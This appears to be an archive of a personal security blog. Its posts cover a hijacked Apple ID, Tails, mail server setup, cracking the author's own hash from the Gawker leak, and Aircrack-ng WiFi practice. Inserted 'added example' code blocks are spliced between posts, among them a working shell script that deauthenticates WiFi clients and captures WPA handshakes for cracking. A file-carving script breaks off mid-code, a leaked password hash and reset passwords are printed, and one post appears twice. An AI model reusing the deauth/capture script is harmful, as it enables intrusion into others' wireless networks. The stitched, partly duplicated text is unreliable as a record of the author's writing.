So quick recap. I got an email saying a new iPhone 5 has logged in to my iMessage account. Problem is, I don't own an iPhone, I don't know what iMessage is, and the email in the salutation isn't mine. The account has someone else's name and contact information, someone from Finland, but MY EMAIL ADDRESS as the verified account.
I've gone through the Find My Apple ID process, and all the info is right when I log in that way, using MY EMAIL ADDRESS for the recovery. When I log in with the Apple ID it emailed me, I get my stuff in English. When I use my email address as the Apple ID, nothing is right.
So after I got home, I did some more digging. I found out how to at least "disable" the account even though I couldn't permanently delete it.
Going through iTunes, yes I had to install it, I could see that person's information. Not all of it, but some of it. Name, address etc. Same stuff I could see via the Apple site.
More checking between the two accounts, I note that my email Apple ID is verified, my other one is not. But both accounts have the same email address. Ok, I'll verify it on the account where everything is in English. Only the site won't let me. It's already been verified elsewhere and in use.
WTF...
The best I can figure out, Apple is using email addresses as their primary keys for the accounts now. Something they were not doing when I first signed up in 2005. Since I first signed up they are verifying accounts as well. Once verified that becomes another account key, secondary, or primary in a second table. The problem is, someone not me was able to get my address listed as their verified address and their account.
I ended up un-associating MY ADDRESS with the account, and sent it off into never land. I hope they have good luck getting their information and account back. I've verified my email address, and have now set it as my account name, with a 30-character password. I'd turn on two-factor auth, but I don't own an Apple device and that's required.
So the short version of the story. Someone got their Apple account associated with my email address. Claimed my address as their own and got it verified somehow. I got a notification when they used a new phone to log in to the account. I took control of the account, because they had used my email address, de-associated the account from my email address, and then made sure that my account was verified with my email address.
Showing posts with label computer security.
Friday, September 20, 2013
Apple Account part 1
So today, I got a strange email. I chalked it up to a phishing attempt at first, but it actually turned out to be something way more interesting.
The way it started:
Dear Paula,

Your Apple ID (my email address) was used to sign in to iMessage on an iPhone 5 named “iPhone (Paula)”.

If you have not recently set up an iPhone with your Apple ID, then you should change your Apple ID password. Learn more.

Apple Support

Well that's odd, my name isn't Paula, and while I own an iPod Color from 2005, I don't use Apple products. In fact I have no idea where that iPod is.
Wait a tick, didn't I get an email a few months ago asking me to verify my Apple ID? The other email I thought was phishing spam... (it's been more than 30 days and I deleted it when it came in).
Well no way this is right. I know, I'll prove it's spam. I'm not going to click shit. I'm going to go to apple.com and try to log in.
So I go there, try logging in with my email address, and am told invalid password. WTF, okay let's try reset password. And lo, I get an email with the steps to reset my password, and I follow suit.
Go to the account page: someone in Finland, with a UK phone number. WTF. Well this can't be right. Someone set up an account, with a verified email address of MY EMAIL ADDRESS, but that's not me. So I'm thinking someone popped my unused account.
After not being able to get past the Finnish security questions, I decide to call Apple Support. I open a case, and talk to a guy. He tried to help, but in the end, without my iPod or some other way to prove my account (the credit card number wasn't mine either), there was little he could do for me. I will say this for Apple, they do try to take your account security seriously, even if they won't let you delete your account.
The Apple guy did think of one thing he could do. He walked me through the Find My Apple ID part of the site. It asked for my name, email address, other possible email address, home address, etc. The next page asked for my DOB (month and day) and then the next page asked for my security question. A question I wasn't expecting, but knew it was mine. One that only I would know the answer to. And then I was able to change my password.
Then I get an email. Saying my ID, yet another one, has had its password changed. Talk about more confusion. But it was time to leave for ISSA, and I was on my merry way, knowing that both accounts had 30-character random passwords.
To be continued.
Sunday, January 27, 2013
Really?
Our apologies for the Fruit Ninja tweet sent earlier. One of our kids played the game on our iPhone and unknowingly tweeted their score.
Really? Seriously? I'm left wondering. Was this iPhone issued by the department? If it was, why was it where a child could reach it? If I was his superior, I would seriously be asking some questions. Maybe I'm jaded from the bs that happened with the ex-Mayor in Detroit.
Look, I get that chefs bring their own knives, and that mechanics bring their own tools. However... BYOD is a bad idea. Tell me, when has an accountant, a CEO, a lawyer, or any other business unit brought their own filing cabinet, corporate ledger, etc.? Ok I know they have the briefcases, file folios and the like, but the damage is smaller with those. It's not everything.
I understand we have commoditized computers and technology, but people really need to think about what that piece of tech does before they hand it to someone else.
Sure, there are some questions: was it a work phone or a personal phone? If it's personal, why does it have work stuff on it? If it's business, why is it being handed to a kid? I'd be worried about them reading the other stuff on the phone.
Lastly I'm curious, would this officer hand his service weapon to his child to play with, or leave it laying around where the kid could get it? I'm sure he is shamed by this point, but seriously it is time to have grown-up conversations about BYOD and how the devices are used outside of work.
Friday, September 21, 2012
One of the ones I didn't like
So I mentioned in the Plan for IA240 blog post, I had some other ideas. Ones that I decided to not go with for various reasons.
One of those ideas that I rejected:
Using a tablet, with my cell phone as a tether. I tried using my cell phone in class the first night. It didn't work too well. It was rather slow Googling questions the professor was asking.
I also didn't like the idea for a handful of reasons. I could be wrong, because I don't understand all the tech.
First the tethering. I have a rooted (running CyanogenMod) cell phone, but every time I tried, I got messages saying the network I have for service is blocking it.
I'm still creating a wireless network that someone could try attacking, or that other people would want to connect to. Not saying people would, but hacking wifi isn't that hard, and if they're willing to go after a laptop, why not go easier with a wifi connection.
I've only used Shark for Root sparingly. As I understand it, it can do 3G packet captures. I'm not sure if that's only for the phone it's on, or if it can grab any 3G signal. I also haven't found much documentation on it. I also don't have the equipment to test it properly at this time. Maybe we can set something like that up at EMU's IA Club, where we can play around with it and see what it does.
Just one of the ideas I tossed to the side. I'll talk about another one some other time.
Labels: computer security, computers, linux, networking, Security
Well Tails works...
Sitting at Eastern Michigan University on the wireless network using T.A.I.L.S. It's a little slow, but that's ok. I'm riding across Tor to an exit node in Germany.
To get this to work:
I loaded the system from the Live CD.
Then using the unsafe browser, I was able to get to the captive portal. To do that, you need to go to a non-HTTPS site. I like to use www.sluggy.com. Going to www.google.com got grabbed by HTTPS Everywhere, and was dragged to encrypted.google.com. Sadly that doesn't work with EMU's captive portal.
After that, I started the Iceweasel browser to make sure it worked right, which it did. Then I shut down the unsafe browser.
So this works.
Labels: computer security, computers, follow ups, fun, Security, T.A.I.L.S.
Thursday, September 20, 2012
Can't wait for Friday
I found out tonight that the IASA (Information Assurance Student Association) is having their kick-off meeting Friday. At 5. Time sucks, but meh.
I'm actually thinking of tossing my id in the bit-bucket for an officer position. Don't know which one yet. I'm sure that'll fly like the NX37602. There are some things I think we could do better as students. Yeah it means more work for us, but in the long run, it makes us better students. No it's not hacking each other. Although some Saturday CTF in L6 wouldn't be too bad. If allowed.
I also got to do some reading on T.A.I.L.S. tonight. I figured I couldn't be the only one that was having problems with captive portals (have to log in to use wireless). Looks like I was right. And I have something to test on Friday now.
Also, a new version of T.A.I.L.S. came out tonight. Version 0.13.0.
Labels: computer security, computers, goals, Security, T.A.I.L.S., tools
Monday, September 17, 2012
There will be some more posts coming
So I've tested T.A.I.L.S.; it comes with sshfs pre-installed. It's also really easy to use. It looks like all the traffic goes through Tor. Next step will be to see if it works with the University's wifi.
I've been asked to do a talk on it.
I'm also going to do some write ups on the options I didn't use and why I didn't want to use them.
Sunday, December 11, 2011
more on the new side project
So after looking around, asking a few people and doing a little reading I've updated www.ratsandrogues.com. Kind of funny that that is going faster than setting up rattis.net.
So yesterday, I set up WordPress, and re-wrote the two entries that were on the Rats and Rogues page. Then created two accounts. Then finally set up email using virtual domains (Postfix + MySQL + Dovecot, etc).
Wish I could say it was all easy and simple. But it wasn't.
Problems I came across:
WordPress:
1) www.ratsandrogues.com/feed wasn't working. The feed validator sites were saying it was not a feed webpage. Going there got a 404 error.
2) If I set the URL to be custom for the entries, I would get a 404 error. But leaving the URLs set as standard instead of custom would work.
2.5) The settings page for custom URLs said that .htaccess was not writable.
Solution:
It looks like all three issues were related. One large problem with simple solutions, but it took forever to research.
2.5) Created the .htaccess file in the root directory for the WordPress site, then changed ownership to the Apache daemon user name.
That allowed the site's settings page to update the .htaccess file.
1 & 2) This one took more time, and lots more research. It looked like that .htaccess file was being ignored. I remember disabling .htaccess when I set up mod_security. Did some reading. I had set AllowOverride None in the config file, and I've had to make changes to the vhosts under that global directive. Once I changed that for only the Rats and Rogues site, both the rewrites for custom URLs and the feed started working.
Email:
Uh this one was a mess.
1) getting the alias forwarding table to push to multiple people.
2) getting email to forward to the people above.
Solutions:
1) I searched around forever trying to figure out how to insert more than one name in the table. I saw some screen grabs that showed it but no idea how they did it. Then one webpage said that most use phpMyAdmin. Yeah, didn't want to install that. To make it work:
INSERT INTO forwarding (`source`, `destination`) VALUES ('aliasemail@example.com', 'email1@example.com, email2@example.com');
Which is just the written out way of saying give the value of the 2 columns, 'source' and 'destination', with 2 elements. The first one is the alias email. The second one is a list of emails separated by commas (,) between the single quotes (') for the second element.
2) With both names in the forwarding table, I gave it a test.
<user2@example.com> (expanded from <alias@example.com>): User unknown in virtual alias table
<user1@example.com> (expanded from <alias@example.com>): User unknown in virtual alias table
Fixing that required commenting out:
receive_override_options = no_address_mappings
in the Postfix main.cf
Which left me with:
User unknown in virtual alias table
which was there because while trying to fix the other problem I set the domain name in
virtual_alias_domains =
Once I fixed that, everything worked.
Tuesday, December 6, 2011
Wednesday, August 31, 2011
times change
So... I don't know.
I got my VPS up and running finally. Went with Linode. Had several friends speak highly of it. Went with a default Debian Squeeze install. Got it hardened as best I could. Now I'm getting ready to hit it with LAMP.
Linux, Apache, MySQL, PHP.
I was thinking LEMP (Nginx instead of Apache), but since I'm going to be running Drupal, and really want an easy set up (the follow-the-howtos-and-be-working kind), I'm going to skip LEMP. Can always change later.
So what will this VPS be doing?
- Personal website. Blog, resume, photo gallery, email etc. Yes I said blog.
- Offer up a site to my martial arts school. Cheaper and more control than what they are using now. Using a CRM framework (Drupal again) should make it easy enough to have updated.
- Maybe a site for the Locksport groups
- shell access for me. Mostly for IRC.
- Photo and video exchange site for the parkour group I'm in. Maybe.
Labels: blog news, computer security, linux, locksport, Martial Arts, Tang Soo Do
Monday, March 14, 2011
new to me tools
I like finding "new" tools. That doesn't mean that the tools themselves are new, just new to me.
In Information Security, I play mostly on the defensive side. Firewalls, nmap scans of my boxes (the ones I'm responsible for), centralized logs, and Google advanced searching.
That doesn't mean I don't want to learn some attacker skills. I'm always trying to learn more, to add more value. Even if the majority of my job now doesn't involve much security (other than the occasional firewall rule).
Therefore I'm reading books on hacking. The one I'm reading now is Dissecting the Hack: The F0rb1dd3n Network. In the STAR section's first chapter I came across 2 tools that seem to be useful. They're plugins for Firefox.
Passive Cache Search: Lets you search the Google cache of a webpage. Usually searching the cached page still pulls down pictures and other multimedia from the site. But Passive Cache is supposed to have a way to do it as text only from the Google cache.
Advanced Dork: Tool to help create advanced Google searches. This one should be fun. It's the one I've been playing with the most out of the two.
Monday, December 13, 2010
passwords below
Yes, I know I posted passwords below. The only place they were ever used, to my knowledge, was on Gawker, and they have been changed since then.
Gawker breached prior to Nov 8th.
So normally, I'd not jump on the sky is falling bandwagon. Really all you can do is change your password everywhere, and then move on.
I have a Gawker account for Lifehacker. I also tend to forget my Gawker password a lot, since I don't leave many comments at LH. So, since I tend to forget it, I just leave it the temp password they send me, and get it reset when I need to.
I saw this tweet from @0ph3lia on Twitter tonight:
RT @georgevhulme: RT @headhntr: Gawker source code and database on The Pirate Bay - http://thepiratebay.org/torrent/6034669
I figured what the hell, I'll get the file, see if I'm in it, and what my password is. My password wasn't in the parse_db.txt file, so for fun, I ran John the Ripper against my hash. I'm still learning the tricks with JtR.
First thing I noticed: there are 2 hashes for me in the full db text file.
username ::: oKIw1WwUpNP3E ::: $2a$10$f42plGhxPm5Xv1K37keWiO3onjZEfoFWCAIQRWPvYRW5.BZiZ5sCa ::: username@webemailprovider.com
The first one is DES, the second one is Blowfish.
I copied that into 2 files on my BT4r2 box, 1 for each hash. Then I created a password file with my saved password from Firefox, and the most recent email I got from Gawker.
Neither password matched. So I went through my email archive and got every password reset email I still had from Gawker.
The password that worked was from September 4th 2009.
============================================
Email from 2009
============================================
Gawker Comments, 9/4/09
You (or someone you know) has requested that your username and password for Gawker Comments be emailed to you. For security purposes, your password has been reset.
Login: username
New Password: ZMvnRxw
============================================
email from November 8th
============================================
noreply@gawker.com, Nov 8
You (or someone you know) has requested that your username and password for Gawker Comments be emailed to you. For security purposes, your password has been reset.
Login: username
New Password: Usql2Aw
----------------------------------------------
I know that I changed my password on 11/08/2010, as you can see from the emails. Since the files were using a password from before then, I know that the breach happened prior to 10:20 am on 11/08/2010.
Don't know if anyone else is really interested in that part.
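The two things the post does by hand, telling the hash formats apart and bounding the breach time from the reset emails, as an added example that is not the post's own code. The dump line and the two reset emails are the ones quoted above; the `user ::: hash1 ::: hash2 ::: email` layout is assumed from that one line.

```python
"""Classify the hashes in a Gawker-style dump line and bound the breach
time from the password-reset history (added example, not from the post)."""
import re
from datetime import datetime

# The dump line quoted in the post (username and email already redacted there).
SAMPLE_LINE = (
    "username ::: oKIw1WwUpNP3E ::: "
    "$2a$10$f42plGhxPm5Xv1K37keWiO3onjZEfoFWCAIQRWPvYRW5.BZiZ5sCa ::: "
    "username@webemailprovider.com"
)

# Traditional DES crypt(3): 2-char salt + 11-char hash. Only the first 8
# password characters are used and there is no tunable cost.
DES_CRYPT = re.compile(r"^[./0-9A-Za-z]{13}$")
# bcrypt: $2a$<cost>$ followed by a 22-char salt and 31-char hash (53 chars).
BCRYPT = re.compile(r"^\$2[abxy]?\$(\d{2})\$[./0-9A-Za-z]{53}$")


def classify_hash(value):
    """Return (scheme, work_factor). The work factor is the bcrypt cost
    exponent (2**cost rounds), 0 for schemes with no tunable cost, or
    None when the format is not recognised."""
    m = BCRYPT.match(value)
    if m:
        return "bcrypt", int(m.group(1))
    if DES_CRYPT.match(value):
        return "des-crypt", 0
    return "unknown", None


def parse_dump_line(line):
    """Split one ':::'-separated dump line into a record with every hash classified."""
    fields = [f.strip() for f in line.split(":::")]
    if len(fields) != 4:
        raise ValueError("expected 4 ':::'-separated fields, got %d" % len(fields))
    user, first, second, email = fields
    hashes = []
    for value in (first, second):
        scheme, cost = classify_hash(value)
        hashes.append({"value": value, "scheme": scheme, "cost": cost})
    return {"user": user, "email": email, "hashes": hashes}


def weakest_hash(record):
    """The hash an attacker cracks first. If a legacy DES hash of the same
    password sits next to the bcrypt one, the bcrypt cost protects nothing:
    DES crypt has no cost factor and caps the password at 8 characters."""
    order = {"des-crypt": 0, "unknown": 1, "bcrypt": 2}
    return min(record["hashes"], key=lambda h: (order[h["scheme"]], h["cost"] or 0))


def breach_window(resets, matched_password):
    """resets: iterable of (datetime, password) from reset emails, any order.
    The dump's hash matched `matched_password`, so the data was copied after
    the reset that issued it and before the next reset replaced it.
    Returns (not_before, not_after); not_after is None if no later reset is known."""
    ordered = sorted(resets)
    for i, (when, password) in enumerate(ordered):
        if password == matched_password:
            upper = ordered[i + 1][0] if i + 1 < len(ordered) else None
            return when, upper
    raise ValueError("matched password is not in the reset history")


# The two reset emails the post quotes; the September 2009 one is what JtR matched.
RESETS = [
    (datetime(2010, 11, 8, 10, 20), "Usql2Aw"),
    (datetime(2009, 9, 4), "ZMvnRxw"),
]

if __name__ == "__main__":
    rec = parse_dump_line(SAMPLE_LINE)
    for h in rec["hashes"]:
        print(h["scheme"], h["cost"], h["value"])
    print("crack first:", weakest_hash(rec)["scheme"])
    print("breach window:", breach_window(RESETS, "ZMvnRxw"))
```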
Thursday, May 27, 2010
it's a start
So... I've mentioned the WIFU class a few times now (see the wifu tag below). I've gotten the first wireless card I needed. I still need at least 1 more. I don't have to have another of the same type, but why not? I've got an old desktop I'm going to hook it up on. I haven't started the class yet, but I have started playing around.
Anyway I've tested the USB wireless card in BackTrack 4 from the live DVD, in my normal Sidux install on this box (my laptop), and now in the BackTrack 4 virtual machine (VM) running on top of my Sidux install.
Tonight, I followed along with the Aircrack-ng tutorials while using the VM with the USB wifi adapter. I was mostly interested in trying packet injection with the card from the VM.
Getting the packet injection to work took some set up. First you have to get the card in monitor mode, and the injection test had a link to that tutorial. However I don't think it worked every time I tried it from the VM. Sometimes the packet injection would work, sometimes it would fail. I usually had to do airmon-ng stop on both mon0 and wlan0, then start it again on wlan0 before the injection would work. Annoying but not enough to make me give up.
I was rather excited about getting injection to work, even if it was a bit dodgy. However, I'm not the kind that is willing to leave well enough alone. Since I don't have everything set up yet for the wireless lab I'm building, I decided to jump ahead to the WPA/WPA2 cracking. (Note I have yet to crack WEP.)
I got airodump-ng running on the network I wanted (my U-Verse 2WIRE access point), and could even see the only client (the Sidux install on the laptop, using the built-in 3945 wireless chip). However I didn't see any authentication packets in airodump-ng. No biggie, the tutorial tells you how to fix that if you're not patient or only have 1 client.
I was able to deauthenticate the host operating system (Sidux), and even watched as wpa_gui would reconnect. However airodump-ng never saw the authentication handshake. I tried looking at what was going on with Wireshark, and could see the deauth packets going out. But no auth packets. The VM wasn't using the network either.
I'm going to have to get more hardware, I'm ordering the second card this weekend. There are some other things I'd like too... Netbook, desktop, multiple monitors, but that will take longer to get.
I was a little surprised at how easy it was to deauth a WPA/WPA2 connection, and wondering how many people around me are messing with other people by sending deauth packets. I mean after all, I live near one University that has an Information Assurance Program, and the other University I live near is well known for having a great Computer Science / Computer Engineering program. :-)
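The post wonders who nearby is sending deauth frames; the defender's side of that question is spotting the bursts in a capture. Added example, not from the post or the Aircrack-ng tutorials: it assumes a tshark-style tab-separated export (time, type/subtype, sender, destination, BSSID, reason code), and the capture it checks is constructed rather than recorded.

```python
"""Flag deauthentication floods in a wireless capture summary (added example).
Input format is assumed: one frame per line, tab separated, in the order
`tshark -T fields` would give for frame.time_epoch, wlan.fc.type_subtype,
wlan.sa, wlan.da, wlan.bssid and wlan.fixed.reason_code.
Mitigation note: with 802.11w (Protected Management Frames) required,
stations drop forged deauths; this detector is for networks that cannot."""
from collections import defaultdict, deque

# IEEE 802.11 type/subtype values as Wireshark encodes them:
# management frames are 0x0X, data frames 0x2X.
BEACON, DISASSOC, DEAUTH, QOS_DATA = 0x08, 0x0A, 0x0C, 0x28
BROADCAST = "ff:ff:ff:ff:ff:ff"

AP = "aa:bb:cc:00:00:01"       # constructed access point MAC
CLIENT = "dd:ee:ff:00:00:02"   # constructed client MAC


def build_sample_capture():
    """Constructed sample: normal traffic, one genuine deauth (client leaving,
    reason 3), then 12 deauths in 1.1 s carrying the AP's address as sender."""
    lines = [
        "%.3f\t0x%04x\t%s\t%s\t%s\t" % (1.000, BEACON, AP, BROADCAST, AP),
        "%.3f\t0x%04x\t%s\t%s\t%s\t" % (1.102, BEACON, AP, BROADCAST, AP),
        "%.3f\t0x%04x\t%s\t%s\t%s\t" % (1.500, QOS_DATA, CLIENT, AP, AP),
        "%.3f\t0x%04x\t%s\t%s\t%s\t3" % (2.000, DEAUTH, CLIENT, AP, AP),
    ]
    lines += ["%.3f\t0x%04x\t%s\t%s\t%s\t7" % (10.0 + i * 0.1, DEAUTH, AP, CLIENT, AP)
              for i in range(12)]
    return "\n".join(lines) + "\n"


def parse_capture(text):
    """Parse the tab-separated export into frame dicts; reason is None when absent."""
    frames = []
    for line in text.splitlines():
        if not line.strip():
            continue
        t, subtype, sa, da, bssid, reason = line.split("\t")
        frames.append({
            "t": float(t),
            "subtype": int(subtype, 0),   # accepts "0x000c" as well as "12"
            "sa": sa, "da": da, "bssid": bssid,
            "reason": int(reason) if reason else None,
        })
    return frames


def detect_deauth_floods(frames, window=5.0, threshold=10):
    """One alert per (sender, BSSID) whose deauth/disassoc frames reach
    `threshold` within any `window` seconds. A real station sends a handful
    of these per association; dozens in a few seconds is not normal."""
    alerts, recent, flagged = [], defaultdict(deque), set()
    for f in sorted(frames, key=lambda x: x["t"]):
        if f["subtype"] not in (DEAUTH, DISASSOC):
            continue
        key = (f["sa"], f["bssid"])
        q = recent[key]
        q.append(f)
        while f["t"] - q[0]["t"] > window:   # drop frames that left the window
            q.popleft()
        if len(q) >= threshold and key not in flagged:
            flagged.add(key)
            alerts.append({
                "sa": f["sa"], "bssid": f["bssid"], "count": len(q),
                "start": q[0]["t"], "end": f["t"],
                "broadcast": any(x["da"] == BROADCAST for x in q),
                "reasons": sorted({x["reason"] for x in q if x["reason"] is not None}),
            })
    return alerts


if __name__ == "__main__":
    for a in detect_deauth_floods(parse_capture(build_sample_capture())):
        print("deauth flood from %s on %s: %d frames in %.1fs, reasons %s"
              % (a["sa"], a["bssid"], a["count"], a["end"] - a["start"], a["reasons"]))
```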
Anyway I've tested the usb wireless card in Backtrack4 from the live DVD, in my normal Sidux install on this box (my laptop), and now in the BackTrack4 virtual machine (VM) running on top of my Sidux install.
Tonight, I followed along with the Aircrack-ng tutorials while using the VM with the USB Wifi adapter. I was mostly interested in trying packet injection with the card from the Virtual.
Getting the packet injection to work took some set up. First you have to get the card in monitoring mode, and the test injection had a link to that tutorial. However I don't think it worked every time I tried it from the VM. Sometimes the packet injection would work, sometimes it would fail. I usually had to do airmon-ng stop on both the mon0 and wlan0, then start it again on wlan0 before the injection would work. Annoying but not enough to make me give up.
I was rather excited about getting injection to work, even if it was a bit dodgy. However, I'm not the kind that is willing to leave well enough alone. Since I don't have everything set up yet for the wireless lab I'm building, I decided to jump ahead to the WPA/WPA2 cracking. (Note I have yet to crack WEP).
I got airodump-ng running on the network I wanted (my U-Verse 2WIRE access point), and could even see the only client (the Sidux install on the laptop, using the built in 3945 wireless chip). However I didn't see any authentication packets in airodump-ng. No biggy, the tutorial tells you how to fix that if you're not patient or only have 1 client.
I was able to deauthenticate the host operating system (Sidux), and even watched as wpa_gui reconnected. However airodump-ng never saw the authentication handshake. I tried looking at what was going on with Wireshark, and could see the deauth packets going out. But no auth packets. The VM wasn't using the network either.
I'm going to have to get more hardware, I'm ordering the second card this weekend. There are some other things I'd like too... Netbook, desktop, multiple monitors, but that will take longer to get.
I was a little surprised at how easy it was to deauth a WPA/WPA2 connection, and wondering how many people around me are messing with other people by sending deauth packets. I mean after all, I live near one University that has an Information Assurance Program, and the other University I live near is well known for having a great Computer Science / Computer Engineering program. :-)
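As an added example, not the post's own commands, here is the deauth-and-capture procedure from the paragraphs above with one change that usually fixes "deauths go out but the handshake never shows up": the dump is locked to the target AP's channel and BSSID, because a hopping capture card is on the wrong channel for most of the EAPOL frames. The airodump-ng CSV embedded below is constructed (the BSSIDs, the "2WIRE123" ESSID and the client MAC are made up); the airodump-ng, aireplay-ng and aircrack-ng invocations assume the aircrack-ng 1.x command lines and only run if the tools are installed.

```sh
#!/bin/sh
# Added example (not from the post): WPA/WPA2 handshake capture locked to the
# AP's channel. Run `airmon-ng start wlan0` first and pass the monitor
# interface it created (mon0, wlan0mon, ...) as the first argument.
# The CSV below is constructed; it mimics what `airodump-ng -w prefix` writes.

SAMPLE_CSV='BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:55, 2010-05-15 20:01:02, 2010-05-15 20:10:59,  6,  54, WPA2, CCMP, PSK, -41,      120,        0,   0.  0.  0.  0,   8, 2WIRE123, 
66:77:88:99:AA:BB, 2010-05-15 20:01:05, 2010-05-15 20:10:58, 11,  54, WEP , WEP, , -70,       30,       12,   0.  0.  0.  0,   7, linksys, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
00:16:EA:12:34:56, 2010-05-15 20:01:10, 2010-05-15 20:10:57, -50,      400, 00:11:22:33:44:55, 2WIRE123'

# ap_from_csv ESSID < airodump.csv -> "BSSID CHANNEL" of that network
# (fields are separated by ", "; ESSID is column 14, channel column 4)
ap_from_csv() {
    awk -F', ' -v e="$1" '$14 == e { print $1, $4 + 0; exit }'
}

# has_handshake CAPFILE BSSID -> 0 when aircrack-ng's network listing shows a
# handshake for BSSID, e.g. "WPA (1 handshake)" (heuristic on its output text)
has_handshake() {
    aircrack-ng "$1" </dev/null 2>/dev/null | grep -F "$2" | grep -q 'WPA ([1-9][0-9]* handshake'
}

# capture_handshake MON_IFACE ESSID CSVFILE OUTPREFIX [CLIENT_MAC]
capture_handshake() {
    mon=$1 essid=$2 csv=$3 prefix=$4 client=${5:-}
    set -- $(ap_from_csv "$essid" < "$csv")
    bssid=${1:-} chan=${2:-}
    if [ -z "$bssid" ]; then echo "ESSID $essid not found in $csv" >&2; return 1; fi
    if ! command -v airodump-ng >/dev/null 2>&1; then
        echo "aircrack-ng suite not installed" >&2; return 2
    fi

    # Lock the dump to the AP's channel and BSSID: no channel hopping.
    airodump-ng -c "$chan" --bssid "$bssid" -w "$prefix" "$mon" >/dev/null 2>&1 &
    dump=$!
    sleep 5
    # A few deauth bursts (directed at one client when its MAC is given) make
    # the client reconnect and redo the 4-way handshake while we are listening.
    aireplay-ng --deauth 3 -a "$bssid" ${client:+-c "$client"} "$mon" >/dev/null 2>&1
    sleep 20
    kill "$dump" 2>/dev/null
    has_handshake "$prefix-01.cap" "$bssid"
}

if [ $# -ge 4 ]; then capture_handshake "$@"; fi
```

Two things to check when it still fails: airodump-ng prints "WPA handshake: BSSID" in its top right corner the moment it has all four messages, and the capture card must hear both the AP and the client, since the handshake needs frames from both sides; with a single client, a directed deauth (-c) is more reliable than the broadcast one.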
Tuesday, May 11, 2010
more on the Cert
So, as I mentioned, I'm a little shocked. I got picked for a free cert course.
After some emails around on who was going to take what, I'm taking WiFu. I actually offered to take it, kind of. I still would have preferred Penetration Testing with Backtrack. But I have a better chance of getting a cert with WiFu and I think that is a little more important.
So for the last week or so (little longer probably), I've been looking at getting things together to do the course.
I'm going to get 2 Alfa AWUS036H and 1 BU-353 USB GPS Unit. The GPS isn't needed but will be fun to play with. And I'll finally be able to do Wardriving / Warwalking and map the data out, instead of just saying hmmm... But that's for another post.
I picked up a cheap old Gateway Celeron, 256 meg, 15 gig hard drive. I'm going to toss straight Debian on it, and attach one of the USB Network Devices to it.
I'm going to dig out my old Linksys wireless router, flash it with Linksys firmware (I can put dd-wrt back on it later), and hook the other Wifi device to my laptop running BackTrack. (If I don't pick up another cheap PC first).
I'll update the blog as I go along.
Labels:
computer security,
computers,
follow ups,
tools,
wardriving,
warwalking,
WiFu
Thursday, April 1, 2010
Wrote a book review
So I said I was reading Hacking for Dummies, 3rd edition. I finished it a while ago. Part of the reason I was reading it was to write a book review for an online magazine.
The book review is up: Ethical Hacker Network Book Review
Monday, August 31, 2009
Ugh... I made a mistake.
I made a mistake.
I've got a lot of work related books to read, and the list is getting longer all the time. Over the weekend I picked up a book on speed reading. 2 actually, at the local library. 1 is a 10 day program, the other I'm not sure about.
Anyway... The NEW 3rd edition of Hacking for Dummies (something recommended at the Ethical Hacker Forums) is coming out soon. The other week, I asked if I should get 2nd ed for 15.00 via Amazon, or wait until December. They said if I could get it now, and read it now, I'd learn more by practicing now, than waiting for the new edition in December. Since I have so much to read, I figured I'd wait. Focus on things that need to get done at work. (Things like setting the networking graphs up (got the ones I needed done), setting up the server monitoring tools (large book), fixing the broken servers (waiting on parts) ).
For some reason between last week, and this week I started looking at the online 2nd edition of HfD on Safari. They won't let me download the whole book, I'm assuming because the new one is coming out. But other than speed reading, that's all I read today (book wise). I finished the preface, the introduction and the first 2 chapters (printed the chapters off for a car pool that did not happen). I've been using some of the tricks I'm picking up in the speed reading book.
Although my reading speed is still between 265 and 300 wpm, with comprehension between 70 and 90% right now.
I'm enjoying Hacking for Dummies, I can't wait to read chapter 3... but I really really should finish Firewalls and Internet Security. I'm about 2/3 of the way done with it so far. The furthest I ever made it. I'm still torn between buying 2nd or 3rd edition of HfD too. I have a feeling I'll end up buying both.
Lastly I should really, really, really be studying for a certification exam (and trying to find a way to pay for it (CCNA, LPI, wouldn't mind Sec+ but I have the books for the other ones)), or writing the essay that's due tomorrow for my 1st gup test in Tang Soo Do.
Lots to do at work too... I'd say I need a time management book, but I've already read Time Management for the System Administrator 2x, and somehow I'm finding time to do everything I need. I've got a block of time (i.e. lunch tomorrow) for the essay questions (note they're designed for kids).
Of course, the biggest question at this point is where do I want my career to go?
Sunday, August 23, 2009
How I spent my Saturday Night...
I'm a geek. I know it. Being broke doesn't help matters much.
For fun tonight I played with the Network Forensics Puzzle that was on ISC.SANS.ORG earlier this week.
I'm no expert, some stuff was beyond my skills tonight before I started. In fact I only started playing, not doing the contest, because someone in a forum posted what tool to use to extract the data. Here is a quick walk through of what I did, without giving too much away I hope.
Downloaded the pcap file and checked the md5sum
They matched so I moved on.
I knew how to load a pcap file into 2 different programs, so I ran it in both, filtering on just the ip address I needed (the user's ip address).
I then looked through the data, using what I knew of the layout to get the username of who the spy was talking to.
Then I found the first comment. Using the same method (reading), I found the name of the file being transferred.
Then I extracted the data that was transferred from the stream. If I knew the magic number, the only part I wasn't able to find, it might have been easier. I used tcpxtract for that bit of magic.
At first I was thinking what was extracted was more like rar files you can find online. Where you unrar the first file, and the rest are used to build the first. While I was eating I realized that might not be the case, and there may have been 37 different files that were actually transferred. It was a case of having just learned to use tcpxtract.
Once I realized that, I found the files that would open with Ark, and which ones didn't. The ones that didn't I ignored. I then tried to extract the others. Only 2 extracted. Again the others I ignored. One was a manifest file, the other the file I wanted. I looked up the document in the file and got the recipe.
Then after bashing my head around some, I figured out, based on comments others had made and how the file is really stored, to change the un-extracted file's name to the right name, and tried opening it with Open Office. It worked. Grabbed the md5sum off that.
Out of the 6.5 requests in the challenge, I did 5 of them. I never found the magic number. :( and I didn't bother to try to script it (computer program) to do the work for me. Because I never found the magic number, and I don't think my programing skills are sharp enough. Although, I didn't think my computer forensics skills were sharp enough at the beginning either.
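The carving step above, tcpxtract's trick of finding embedded files by their magic numbers, as an added shell example that is not from the post: it lists where each known header starts in a blob, cuts every object out up to the next header, and labels the result, including the check that tells an OpenDocument file from a plain zip (an ODF package is a zip whose first entry is named mimetype, with its META-INF/manifest.xml alongside). The blob is constructed inside the script; its zip and gzip members are header-only and will not open in a real application. The magic numbers used (PK\003\004, 1f 8b 08, %PDF, \211PNG) are the standard ones.

```sh
#!/bin/sh
# Added example (not from the post): a small tcpxtract-style carver.
# Objects run from one recognised header to the next (or to end of file);
# there is no footer parsing, the same simplification tcpxtract makes with
# its maximum-size setting.

# offsets_of FILE HEXMAGIC -> byte offset of every occurrence, one per line
offsets_of() {
    od -An -v -tx1 "$1" | tr -d ' \n' | awk -v m="$2" '{
        s = $0; base = 0
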